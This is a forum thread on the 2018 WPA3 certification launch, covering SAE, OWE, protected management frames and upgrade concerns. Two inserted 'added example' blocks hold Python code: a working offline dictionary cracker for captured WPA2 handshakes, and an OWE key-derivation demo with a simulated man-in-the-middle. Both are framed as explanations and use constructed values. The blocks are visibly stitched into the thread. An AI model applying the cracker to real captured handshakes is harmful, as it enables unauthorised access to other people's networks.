

Featured WPA3 Certification Open For Business

Discussion in 'General Wireless Discussion' started by thiggins, Jun 26, 2018.

  1. thiggins

    thiggins Mr. Easy Staff Member

    Joined:
    May 18, 2008
    Messages:
    13,509
    The Wi-Fi Alliance yesterday formally introduced Wi-Fi CERTIFIED WPA3 wireless security, the intended replacement for the less-secure WPA2, which is supported on virtually all of today's Wi-Fi devices.

    Like WPA2, WPA3 is not an IEEE standard, but a specification and certification program created by the Wi-Fi Alliance. Also like its predecessor, WPA3 comes in Personal and Enterprise flavors, the latter optionally supporting 192-bit encryption.

    The Alliance offers no summary of the differences between WPA2 and WPA3. But this DarkReading post from today offers a good description of WPA3's key features. This post by Mathy Vanhoef provides much-needed details about WPA3. And this newer post describes what the actual WPA3 Certification announced today really supports.

    Also announced was Wi-Fi CERTIFIED Easy Connect, which in earlier descriptions of WPA3, was part of that specification. It's now been broken into its own certification, however, because Easy Connect is focused on securely connecting devices with "limited or no" display. This would most commonly be done by scanning a QR code on the device using a smartphone or tablet.

    You'll be able to run mixed networks of WPA2 and WPA3 devices, once routers and APs supporting WPA3 appear. Eventually, however, WPA3 will become mandatory to access 11ac and 11ax features, just as WPA2/AES is required to access 802.11ac's higher link rates now.

    Don't expect to see firmware or driver upgrades enabling WPA3 for your current collection of devices. WPA3 requires new hardware, so you'll need to buy new stuff.

    The Alliance's Certified Product Finder already has checkboxes up for WPA3 and Wi-Fi Easy Connect, but no devices have been certified yet.

    [Wi-Fi Alliance press release.]
     
    Last edited: Jun 27, 2018
  3. Makaveli

    Makaveli Senior Member

    Joined:
    Nov 4, 2016
    Messages:
    293
    Location:
    Canada
    Finally.

    Now just waiting for Asus to release a model that supports this and have a viable upgrade path.
     
  4. thiggins

    thiggins Mr. Easy Staff Member

    Joined:
    May 18, 2008
    Messages:
    13,509
    What do you mean by this? The upgrade path is: buy a new router and clients to go with it.
     
  5. coxhaus

    coxhaus Part of the Furniture

    Joined:
    Oct 7, 2010
    Messages:
    2,240
    Location:
    texas
    So are all wireless routers obsolete? Good thing I run a wired only router.
     
  6. Makaveli

    Makaveli Senior Member

    Joined:
    Nov 4, 2016
    Messages:
    293
    Location:
    Canada
    I understand that. I just mean it's an upgrade path for me, since I've been waiting for this to be released instead of upgrading to a more powerful router right now.
     
  7. thiggins

    thiggins Mr. Easy Staff Member

    Joined:
    May 18, 2008
    Messages:
    13,509
    No. They're just less secure than WPA3 will be. But you're running with WPA2 now (I assume) and you ain't dead yet. :)

    You guys are old enough to remember the WEP -> WPA transition, right? And how throughput went to crap when you used WPA until they moved the encryption code from the driver to an embedded processor in the Wi-Fi MAC.

    We lived through that and we'll survive this transition too.
     
  8. Jim Salter

    Jim Salter Regular Contributor

    Joined:
    Apr 28, 2017
    Messages:
    50
    Nope. Am dead already. *ded*

    I seriously might be a little salty that a single fell swoop just rendered pretty much every single wifi device I've ever tested obsolete. Granted we'll still be using the obsolete stuff for a bit, but...

    How sure are you that this stuff can't ever be implemented in firmware? Seems pretty crazy to suddenly obsolete every single chipset on the market for what seems to amount to a mediocre-at-best improvement.
     
  9. DancinJack

    DancinJack New Around Here

    Joined:
    Jun 26, 2018
    Messages:
    2
    That's...not true. WPA2 devices are not "obsolete." They're just not as secure as WPA3. It's not like you won't be able to use them for years to come. Let alone it'll take years for businesses and others to upgrade to WPA3 hardware. Can people please stop saying obsolete. It's not the right word choice. Please, stop.
     
    RMerlin likes this.
  10. Jim Salter

    Jim Salter Regular Contributor

    Joined:
    Apr 28, 2017
    Messages:
    50
    Well, not yet anyway. But when the next KRACK hits, what are the odds anybody's going to bother fixing it on WPA2 now that nice and shiny WPA3 is here, and everybody wants to sell their nice and shiny new WPA3 devices anyway?
     
  11. DancinJack

    DancinJack New Around Here

    Joined:
    Jun 26, 2018
    Messages:
    2
    Considering there are literally billions of devices that will be on WPA2 forever, someone will do it. You think the whole world is just going to write off everything that is out there now? I don't think so :)
     
  12. umarmung

    umarmung Regular Contributor

    Joined:
    Apr 21, 2018
    Messages:
    186
    Not even remotely close to a mediocre-at-best improvement. This is the largest improvement in WiFi security, especially in enterprise, for over a decade. It is also night and day in security for open hotspots - so much so that this part is being rushed to market.
    1. Simultaneous Authentication of Equals handshake (SAE): offline dictionary attack resistant + forward secrecy
    2. Device Provisioning Protocol (DPP): WPS replacement using public keys
    3. Opportunistic Wireless Encryption (OWE): encryption by default for open networks, i.e. hotspots, defeating passive attacks
    4. Enterprise Commercial National Security Algorithms suite (CNSA): increased key sizes such as AES-GCM-256 & elliptic curve crypto 384-bit curves & SHA384 & RSA keys 3072+ == 192-bit security symmetric
    5. Protected Management Frames (PMF): post-KRACK vulnerability, WPA2 and WPA3 require support for PMF, preventing deauthentication attacks where APs can be forced to disconnect clients, a form of active attack
    This is still significantly behind the most up to date security standards, but the previous models are so weak in multiple areas, this is a very large security improvement.

    The last, PMF, can be quite easily retrofitted into existing devices via firmware. The rest includes new encryption and new uses of encryption, especially heavy in the case of CNSA.

    Economically, it makes little sense why manufacturers would choose to take on costly viability assessments and re-optimization within very tight hardware restrictions for most consumer and SOHO gear just to then offer it all as a free upgrade in firmware that only a fraction of its customer base may install. The increased resource usage is not in any way free, either labor, increased power requirements, increased operational requirements (temperature increases), increased validation and certification costs.

    Furthermore, even if sections of the new standard (other than PMF), could be implemented for a specific product or product line, it would be extremely unlikely all of them could be incorporated for the device to be WPA3 certifiable or even marketable as such. For consumer gear, lack of such clear differentiation will not help market a product.

    Finally, there is the perverse reputational risk of effectively choosing a mixed/segmented product line based on customer firmware uptake, then supporting it. That may be fine for enterprise and some SOHO customers. But for consumers, fielding entirely new, certified product lines earlier than competitors may be the safer business option.

    So, my belief is that far more likely, just like the previous WEP-WPA transition, there will be a slew of new hardware re-releases followed by further hardware-optimized releases, maximizing profitability and taking advantage of new resources like modern commodity chips.
     
    Last edited: Jun 26, 2018
    Moogle Stiltzkin and daviworld like this.
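    Added example, not part of umarmung's post and not code from any vendor: it shows the WPA2-PSK weakness that item 1 (SAE) is designed to remove, namely the offline dictionary attack against a captured 4-way handshake. The PMK and PTK are derived the way IEEE 802.11 specifies (PBKDF2-HMAC-SHA1 over the SSID, then PRF-512 over both MACs and both nonces), and the EAPOL-Key MIC of message 2 is recomputed for each candidate passphrase until it matches. Everything is in the capture except the passphrase, which is exactly why a passive sniffer can grind through a wordlist at leisure; SAE's commit/confirm exchange gives an attacker only one online guess per run. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed for the demo; the frame uses the standard EAPOL-Key layout (MIC at byte offset 81) with placeholder header values.

```python
import hashlib
import hmac

# Constructed sample network (not a real capture); every value below is made up for the demo.
SSID = b"SNBExampleNet"
AP_MAC = bytes.fromhex("0011223344aa")
STA_MAC = bytes.fromhex("66778899bbcc")
ANONCE = bytes(range(32))           # AP nonce from message 1 of the 4-way handshake
SNONCE = bytes(range(32, 64))       # station nonce from message 2
MIC_OFFSET = 81                     # byte offset of the 16-byte MIC in an EAPOL-Key frame
TRUE_PASSPHRASE = "blue-kettle-42"  # what the "victim" network actually uses (constructed)


def wpa2_pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: concatenated HMAC-SHA1 blocks, truncated to 64 bytes."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus the public handshake values (both MACs, both nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """HMAC-SHA1-128 over the EAPOL-Key frame with the MIC field zeroed (CCMP, descriptor v2)."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(kck: bytes, snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 with the standard field layout and placeholder values."""
    body = (b"\x01\x03\x00\x5f"         # 802.1X header: version 1, EAPOL-Key, body length 95
            + b"\x02"                   # descriptor type: RSN
            + b"\x01\x0a"               # key info: pairwise, MIC bit set, descriptor version 2
            + b"\x00\x10"               # key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"     # replay counter
            + snonce                    # the station's nonce, sent in the clear
            + b"\x00" * 16              # key IV
            + b"\x00" * 8               # key RSC
            + b"\x00" * 8               # reserved
            + b"\x00" * 16              # MIC placeholder, filled in below
            + b"\x00\x00")              # key data length
    mic = eapol_mic(kck, body)
    return body[:MIC_OFFSET] + mic + body[MIC_OFFSET + 16:]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, frame, wordlist):
    """Offline attack: every input but the passphrase is in the capture, so test candidates locally."""
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = wpa2_ptk(wpa2_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return candidate
    return None


# The "capture": the victim's message 2, built with the real passphrase the attacker does not know.
CAPTURED_MSG2 = build_msg2(
    wpa2_ptk(wpa2_pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16], SNONCE)
WORDLIST = ["password", "letmein", "blue-kettle-42", "hunter2"]  # constructed wordlist

if __name__ == "__main__":
    print("recovered passphrase:",
          crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST))
```

    The cost per guess is one PBKDF2 run (4096 SHA-1 rounds), which is why GPU crackers chew through WPA2 wordlists at millions of guesses per second; nothing in the capture stops the attacker from retrying. With SAE the password element is never transmitted and each failed guess costs a live exchange with the AP, which is the property umarmung's "offline dictionary attack resistant" refers to.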
  13. Jim Salter

    Jim Salter Regular Contributor

    Joined:
    Apr 28, 2017
    Messages:
    50
    Can you elaborate on this one? How will this defeat a typical wifi pineapple scenario in which an AP just says "yep, that's me" to any beacon request made by a STA?
     
  14. umarmung

    umarmung Regular Contributor

    Joined:
    Apr 21, 2018
    Messages:
    186
    That's not a passive attack :)

    At the moment, as I'm sure you are aware, you can just listen for every single packet on an open network.
     
  15. sfx2000

    sfx2000 Part of the Furniture

    Joined:
    Aug 11, 2011
    Messages:
    13,300
    Location:
    San Diego, CA
    The transition will be more similar to the WPA to WPA2 move - and WPA3 devices must support WPA2, so the existing investment in clients/APs is protected.
     
  16. Razor512

    Razor512 Senior Member

    Joined:
    Sep 29, 2012
    Messages:
    433
    During the transition period where most APs will have to use both WPA2 and WPA3, is there any possible risk of a downgrade attack, or is it completely resistant to any form of downgrade attack if an attacker is actively interfering while a client is attempting to connect to the AP?
     
  17. sfx2000

    sfx2000 Part of the Furniture

    Joined:
    Aug 11, 2011
    Messages:
    13,300
    Location:
    San Diego, CA
    It doesn't - WiFi pineapple MITM attacks will continue to be a problem... as just like WPA2, one can essentially take a client down to an appropriate level for, ahem, forensic analysis...

    Where OWE comes into play is that unlike current implementations, where on an Open network everything is in the clear, on a WPA3 Open Network you will have a temporary PMK, and each WPA3 client associated will have their own temporary one, so that solves the issue of just firing up a client STA in monitor mode and sucking down everyone's traffic on the BSS.

    Not perfect, but it does help...
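    Added example, not part of sfx2000's post and not hostapd or any vendor's code: the OWE exchange described above (and umarmung's item 3), in Python. Client and AP each generate an ephemeral Diffie-Hellman key, exchange the public values in the Association Request and Response, and derive a PMK with the RFC 8110 HKDF construction, so every association gets its own PMK and a monitor-mode sniffer that captures only the two public values cannot reconstruct it. The second function models the active Wi-Fi Pineapple case from the same reply: an attacker who terminates both exchanges ends up holding both sides' keys, because OWE authenticates nobody. Assumptions made for the demo: finite-field DH with RFC 3526 group 14 instead of the ECDH P-256 group (group 19) that RFC 8110 mandates, so that no crypto library is needed (the derivation steps are the same); SHA-256 as the hash; and a big-endian encoding of the 2-octet group id inside the HKDF salt, which is this demo's choice rather than something taken from the spec.

```python
import hashlib
import hmac
import secrets

# RFC 3526 MODP group 14: 2048-bit safe prime, generator 2, IANA "Group Description" id 14.
# Chosen here so the demo runs with the standard library only; real OWE uses P-256 (group 19).
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05"
    "98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB"
    "9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
    "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718"
    "3995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF", 16)
G = 2
GROUP_ID = 14
PLEN = 256  # octet length of p, used to encode DH elements


def keypair():
    """Fresh ephemeral DH key pair; OWE generates one per association on both sides."""
    priv = secrets.randbelow(P - 3) + 2
    return priv, pow(G, priv, P)


def elem(x: int) -> bytes:
    """Fixed-length big-endian encoding of a group element or shared secret."""
    return x.to_bytes(PLEN, "big")


def hkdf_extract(salt: bytes, ikm: bytes) -> bytes:
    return hmac.new(salt, ikm, hashlib.sha256).digest()


def hkdf_expand(prk: bytes, info: bytes, length: int) -> bytes:
    out, block, counter = b"", b"", 1
    while len(out) < length:
        block = hmac.new(prk, block + info + bytes([counter]), hashlib.sha256).digest()
        out += block
        counter += 1
    return out[:length]


def owe_pmk(client_pub: int, ap_pub: int, shared: int) -> bytes:
    """RFC 8110 section 4.4: PMK = HKDF-expand(HKDF-extract(C | A | group, z), "OWE Key Generation", n).
    Big-endian encoding of the 2-octet group id is an assumption of this demo."""
    salt = elem(client_pub) + elem(ap_pub) + GROUP_ID.to_bytes(2, "big")
    return hkdf_expand(hkdf_extract(salt, elem(shared)), b"OWE Key Generation", 32)


def owe_pmkid(client_pub: int, ap_pub: int) -> bytes:
    """PMKID = Truncate-128(SHA-256(C | A)); a returning client uses it to ask for PMK caching."""
    return hashlib.sha256(elem(client_pub) + elem(ap_pub)).digest()[:16]


def owe_association():
    """Honest client and AP. Returns (client_pmk, ap_pmk, what a passive sniffer sees)."""
    c_priv, c_pub = keypair()   # client: Association Request carries C in the OWE DH element
    a_priv, a_pub = keypair()   # AP: Association Response carries A
    client_pmk = owe_pmk(c_pub, a_pub, pow(a_pub, c_priv, P))
    ap_pmk = owe_pmk(c_pub, a_pub, pow(c_pub, a_priv, P))
    # A monitor-mode sniffer captures only C and A. Without c_priv or a_priv it cannot form z,
    # so it cannot derive this client's PMK, and the next client gets a different one anyway.
    return client_pmk, ap_pmk, (c_pub, a_pub)


def mitm_association() -> bool:
    """Active attacker: rogue AP towards the client, rogue client towards the real AP.
    OWE has no authentication, so both honest sides complete happily with the attacker's key."""
    c_priv, c_pub = keypair()
    a_priv, a_pub = keypair()
    m_priv, m_pub = keypair()
    client_pmk = owe_pmk(c_pub, m_pub, pow(m_pub, c_priv, P))        # client believes m_pub is the AP
    mitm_client_side = owe_pmk(c_pub, m_pub, pow(c_pub, m_priv, P))
    ap_pmk = owe_pmk(m_pub, a_pub, pow(a_pub, m_priv, P))            # AP believes m_pub is the client
    mitm_ap_side = owe_pmk(m_pub, a_pub, pow(m_pub, a_priv, P))
    return client_pmk == mitm_client_side and ap_pmk == mitm_ap_side and client_pmk != ap_pmk


if __name__ == "__main__":
    c, a, seen = owe_association()
    print("client and AP agree:", c == a, " PMKID:", owe_pmkid(*seen).hex())
    print("active MITM still reads everything:", mitm_association())
```

    Running it twice gives two unrelated PMKs for the same AP, which is the per-client key the post describes; the `mitm_association` result is the caveat, an evil twin that answers the probe first gets the client's DH exchange and the plaintext with it. OWE raises the bar from "anyone in range" to "someone running an active rogue AP", nothing more.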
     
  18. sfx2000

    sfx2000 Part of the Furniture

    Joined:
    Aug 11, 2011
    Messages:
    13,300
    Location:
    San Diego, CA
    I foresee this as an implementation detail - challenge here is that 802.11n/11ac require WPA2 - WPA3 wasn't around when the 11ac spec was passed, so all 802.11n/11ac capable APs need to support both.

    11n/11ac - WPA1 was not officially supported, but many AP's can run in mixed mode, mainly to support legacy clients running 11g/11n or hopefully not 11b ;)
     
  19. sfx2000

    sfx2000 Part of the Furniture

    Joined:
    Aug 11, 2011
    Messages:
    13,300
    Location:
    San Diego, CA
    One of the other things in Vanhoef's review - moving forward at some point, WPA2 certification will require Protected Management Frames - not sure how they're going to handle WPA2 legacy, as there are many 11n/11ac client stations that do not support PMF...
     
  20. sfx2000

    sfx2000 Part of the Furniture

    Joined:
    Aug 11, 2011
    Messages:
    13,300
    Location:
    San Diego, CA
    daviworld and umarmung like this.
  21. Jim Salter

    Jim Salter Regular Contributor

    Joined:
    Apr 28, 2017
    Messages:
    50
    I suppose I didn't really catch just how "passive" you meant.

    Yes I'm aware that any packet may be inspected on an open network; this is much less of a concern than it used to be due to the proliferation of TLS/SSL on (almost) all the things. Right now DNS is the remaining really weak point, but even that's rapidly evolving.

    As far as I'm concerned, until pineapple-style attacks are nerfed nothing's changed much.
     